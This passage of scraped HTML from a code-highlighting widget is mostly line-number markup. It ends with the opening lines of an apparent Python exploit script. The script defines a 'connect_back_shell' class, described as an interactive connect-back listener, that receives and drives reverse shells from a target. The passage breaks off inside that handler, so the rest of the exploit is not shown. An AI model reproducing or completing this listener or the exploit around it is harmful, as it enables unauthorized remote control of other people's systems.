crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-151\">151<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-152\">152<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-153\">153<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-154\">154<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-155\">155<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-156\">156<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-157\">157<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-158\">158<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-159\">159<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-160\">160<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-161\">161<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-162\">162<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-163\">163<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-164\">164<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-165\">165<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-166\">166<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-167\">167<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-168\">168<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-169\">169<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-170\">170<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-171\">171<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-172\">172<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-173\">173<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-174\">174<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-175\">175<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-176\">176<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-177\">177<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-178\">178<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-179\">179<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-180\">180<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-181\">181<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-182\">182<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-183\">183<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-184\">184<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-185\">185<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-186\">186<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-187\">187<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-188\">188<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-189\">189<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-190\">190<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-191\">191<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-192\">192<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-193\">193<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-194\">194<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-195\">195<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-196\">196<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-197\">197<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-198\">198<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-199\">199<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-200\">200<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-201\">201<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-202\">202<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-203\">203<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-204\">204<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-205\">205<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-206\">206<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-207\">207<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-208\">208<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-209\">209<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-210\">210<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-211\">211<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-212\">212<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-213\">213<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-214\">214<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-215\">215<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-216\">216<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-217\">217<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-218\">218<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-219\">219<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-220\">220<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-221\">221<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-222\">222<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-223\">223<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-224\">224<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-225\">225<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-226\">226<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-227\">227<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-228\">228<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-229\">229<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-230\">230<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-231\">231<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-232\">232<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-233\">233<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-234\">234<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-235\">235<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-236\">236<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-237\">237<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-238\">238<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-1\"><span class=\"crayon-p\">#!\/usr\/local\/bin\/python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">re<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">os<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">time<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">select<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-8\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-t\">string<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-9\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">random<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-10\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">zipfile<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-11\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">termios<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-12\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">hashlib<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-13\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-14\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">threading<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-15\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">SocketServer<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-16\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">cStringIO <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">StringIO<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-17\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-18\"><span class=\"crayon-p\"># interactive connectback listener<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-19\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">connect_back_shell<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">SocketServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">BaseRequestHandler<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-21\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;our interactive, shell like client<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-22\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">handle<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">request<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-25\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">old_settings<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">termios<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">tcgetattr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">close<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">close<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span 